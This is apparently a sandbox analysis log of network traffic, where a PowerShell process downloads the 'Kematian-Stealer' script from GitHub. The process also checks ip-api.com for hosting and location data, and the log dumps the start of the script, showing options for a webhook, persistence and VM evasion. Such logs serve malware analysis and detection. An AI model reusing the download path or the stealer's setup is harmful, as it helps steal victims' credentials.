                                      Jul 3, 2024 18:08:55.801157951 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.801163912 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.801197052 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.801224947 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.801904917 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.801923037 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.801975965 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.801987886 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.802000046 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.802066088 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.802880049 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.802894115 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.802963972 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.802969933 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.804588079 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.804609060 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.804683924 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.804689884 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.806107044 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.806121111 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.806180954 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.806186914 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.858665943 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.905831099 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.905862093 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.905924082 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.905932903 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.905981064 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.907155991 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.907176971 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.907221079 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.907227993 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.907258034 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.907277107 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.908411980 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.908427000 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.908478975 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.908488035 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.908519983 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.908543110 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.908992052 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.909008026 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.909090996 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.909101009 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.909148932 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.909799099 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.909816027 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.909883022 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.909889936 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.909931898 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.910245895 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.910260916 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.910335064 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.910341978 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.910384893 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.912914991 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.912930965 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.912992954 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.913000107 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.913043022 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.913522005 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.913537025 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.913610935 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.913615942 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.913662910 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.998121977 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.998147964 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.998218060 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.998226881 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.998270988 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.999228001 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.999245882 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.999350071 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:55.999356985 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:55.999413967 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.000782013 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.000797987 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.000869036 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.000876904 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.000920057 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.001708984 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.001723051 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.001780033 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.001786947 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.001832008 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.002459049 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.002474070 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.002535105 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.002541065 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.002593040 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.003283024 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.003298044 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.003365993 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.003371954 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.003418922 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.005496979 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.005511999 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.005572081 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.005578041 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.005640030 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.006660938 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.006676912 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.006743908 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.006751060 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.006791115 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.088043928 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.088066101 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.088115931 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.088124037 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.088157892 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.088172913 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.089087009 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.089101076 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.089157104 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.089164019 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.089204073 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.091139078 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.091154099 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.091223955 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.091229916 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.091269016 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.091557980 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.091573000 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.091638088 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.091645002 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.091696978 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.092308044 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.092324018 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.092382908 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.092389107 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.092428923 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.092921972 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.092936039 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.092993975 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.092998981 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.093051910 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.095101118 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.095117092 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.095175028 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.095180988 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.095225096 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.095909119 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.095927000 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.095994949 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.096000910 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.096050024 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.178919077 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.178941011 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.178977966 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.178987026 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.179039001 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.180075884 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.180089951 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.180152893 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.180160046 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.180217028 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.181951046 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.181967020 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.182009935 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.182015896 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.182064056 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.182934046 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.182950974 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.183002949 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.183008909 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.183051109 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.183219910 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.183233976 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.183280945 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.183288097 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.183316946 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.183332920 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.183732033 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.183746099 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.183811903 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.183818102 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.183867931 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.185997963 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.186012983 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.186074018 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.186079025 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.186125040 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.187123060 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.187139034 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.187191963 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.187199116 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.187239885 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.269990921 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.270009995 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.270077944 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.270087004 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.270140886 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.271032095 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.271047115 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.271114111 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.271119118 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.271173954 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.273001909 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.273016930 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.273091078 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.273097992 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.273138046 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.273343086 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.273363113 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.273416996 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.273421049 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.273458004 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.273489952 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.274108887 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.274125099 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.274205923 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.274213076 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.274254084 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.274497986 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.274549007 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.274564028 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.274570942 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.274583101 CEST44349725185.199.110.133192.168.2.7
                                      Jul 3, 2024 18:08:56.274626970 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:08:56.275114059 CEST49725443192.168.2.7185.199.110.133
                                      Jul 3, 2024 18:09:59.277822018 CEST8049717208.95.112.1192.168.2.7
                                      Jul 3, 2024 18:09:59.280719042 CEST4971780192.168.2.7208.95.112.1
                                      Jul 3, 2024 18:10:07.962183952 CEST4971780192.168.2.7208.95.112.1
                                      Jul 3, 2024 18:10:07.967015982 CEST8049717208.95.112.1192.168.2.7

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jul 3, 2024 18:08:27.049423933 CEST5655253192.168.2.71.1.1.1
                                      Jul 3, 2024 18:08:27.057097912 CEST53565521.1.1.1192.168.2.7
                                      Jul 3, 2024 18:08:29.988281012 CEST5246653192.168.2.71.1.1.1
                                      Jul 3, 2024 18:08:29.995965004 CEST53524661.1.1.1192.168.2.7
                                      Jul 3, 2024 18:08:31.351383924 CEST6507553192.168.2.71.1.1.1
                                      Jul 3, 2024 18:08:31.360054970 CEST53650751.1.1.1192.168.2.7
                                      Jul 3, 2024 18:08:37.631095886 CEST6528153192.168.2.71.1.1.1
                                      Jul 3, 2024 18:08:37.641199112 CEST53652811.1.1.1192.168.2.7
                                      Jul 3, 2024 18:08:52.644654036 CEST5089853192.168.2.71.1.1.1
                                      Jul 3, 2024 18:08:52.651621103 CEST53508981.1.1.1192.168.2.7

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jul 3, 2024 18:08:27.049423933 CEST192.168.2.71.1.1.10x1ca2Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                      Jul 3, 2024 18:08:29.988281012 CEST192.168.2.71.1.1.10x3c59Standard query (0)www.cloudflare.comA (IP address)IN (0x0001)false
                                      Jul 3, 2024 18:08:31.351383924 CEST192.168.2.71.1.1.10x407dStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                      Jul 3, 2024 18:08:37.631095886 CEST192.168.2.71.1.1.10xb59fStandard query (0)github.comA (IP address)IN (0x0001)false
                                      Jul 3, 2024 18:08:52.644654036 CEST192.168.2.71.1.1.10x9555Standard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jul 3, 2024 18:08:27.057097912 CEST1.1.1.1192.168.2.70x1ca2No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                      Jul 3, 2024 18:08:27.057097912 CEST1.1.1.1192.168.2.70x1ca2No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                      Jul 3, 2024 18:08:27.057097912 CEST1.1.1.1192.168.2.70x1ca2No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                      Jul 3, 2024 18:08:27.057097912 CEST1.1.1.1192.168.2.70x1ca2No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                      Jul 3, 2024 18:08:29.995965004 CEST1.1.1.1192.168.2.70x3c59No error (0)www.cloudflare.com104.16.123.96A (IP address)IN (0x0001)false
                                      Jul 3, 2024 18:08:29.995965004 CEST1.1.1.1192.168.2.70x3c59No error (0)www.cloudflare.com104.16.124.96A (IP address)IN (0x0001)false
                                      Jul 3, 2024 18:08:31.360054970 CEST1.1.1.1192.168.2.70x407dNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                      Jul 3, 2024 18:08:37.641199112 CEST1.1.1.1192.168.2.70xb59fNo error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                      Jul 3, 2024 18:08:52.651621103 CEST1.1.1.1192.168.2.70x9555No error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                      Jul 3, 2024 18:08:52.651621103 CEST1.1.1.1192.168.2.70x9555No error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                      Jul 3, 2024 18:08:52.651621103 CEST1.1.1.1192.168.2.70x9555No error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                      Jul 3, 2024 18:08:52.651621103 CEST1.1.1.1192.168.2.70x9555No error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • raw.githubusercontent.com
                                      • www.cloudflare.com
                                      • github.com
                                      • objects.githubusercontent.com
                                      • ip-api.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.749717208.95.112.1807696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 3, 2024 18:08:31.366832018 CEST175OUTGET /line/?fields=hosting HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Jul 3, 2024 18:08:31.868774891 CEST175INHTTP/1.1 200 OK
                                      Date: Wed, 03 Jul 2024 16:08:31 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 60
                                      X-Rl: 44
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false
                                      Jul 3, 2024 18:08:31.878092051 CEST135OUTGET /json HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: ip-api.com
                                      Jul 3, 2024 18:08:31.982695103 CEST482INHTTP/1.1 200 OK
                                      Date: Wed, 03 Jul 2024 16:08:31 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 305
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 59
                                      X-Rl: 43
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                      Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}


                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.749711185.199.109.1334437696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-03 16:08:27 UTC230OUTGET /ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1 HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: raw.githubusercontent.com
                                      Connection: Keep-Alive
                                      2024-07-03 16:08:27 UTC894INHTTP/1.1 200 OK
                                      Connection: close
                                      Content-Length: 75387
                                      Cache-Control: max-age=300
                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                      Content-Type: text/plain; charset=utf-8
                                      ETag: "7898c90ad61bf9f09ea5c7bdc5b7dff9483b68f37366fd1935629be43996f9e3"
                                      Strict-Transport-Security: max-age=31536000
                                      X-Content-Type-Options: nosniff
                                      X-Frame-Options: deny
                                      X-XSS-Protection: 1; mode=block
                                      X-GitHub-Request-Id: 6851:1B3316:374460:3C2ACA:6685777B
                                      Accept-Ranges: bytes
                                      Date: Wed, 03 Jul 2024 16:08:27 GMT
                                      Via: 1.1 varnish
                                      X-Served-By: cache-ewr18180-EWR
                                      X-Cache: MISS
                                      X-Cache-Hits: 0
                                      X-Timer: S1720022908.651620,VS0,VE58
                                      Vary: Authorization,Accept-Encoding,Origin
                                      Access-Control-Allow-Origin: *
                                      Cross-Origin-Resource-Policy: cross-origin
                                      X-Fastly-Request-ID: b50e1488f47c0692b38394eb7e79dd9a2b0970cc
                                      Expires: Wed, 03 Jul 2024 16:13:27 GMT
                                      Source-Age: 0
                                      2024-07-03 16:08:27 UTC1378INData Raw: 23 24 77 65 62 68 6f 6f 6b 20 3d 20 22 59 4f 55 52 5f 55 52 4c 5f 48 45 52 45 5f 53 45 52 56 45 52 22 20 0d 0a 23 24 64 65 62 75 67 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 62 6c 6f 63 6b 68 6f 73 74 73 66 69 6c 65 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 63 72 69 74 69 63 61 6c 70 72 6f 63 65 73 73 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 6d 65 6c 74 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 66 61 6b 65 65 72 72 6f 72 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 70 65 72 73 69 73 74 65 6e 63 65 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 77 72 69 74 65 5f 64 69 73 6b 5f 6f 6e 6c 79 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 76 6d 5f 70 72 6f 74 65 63 74 20 3d 20 24 66 61 6c 73 65 0d 0a 23 24 65 6e 63 72 79 70 74 69 6f 6e 5f 6b 65 79 20 3d 20 22 59 4f 55 52 5f 45 4e 43 5f 4b 45
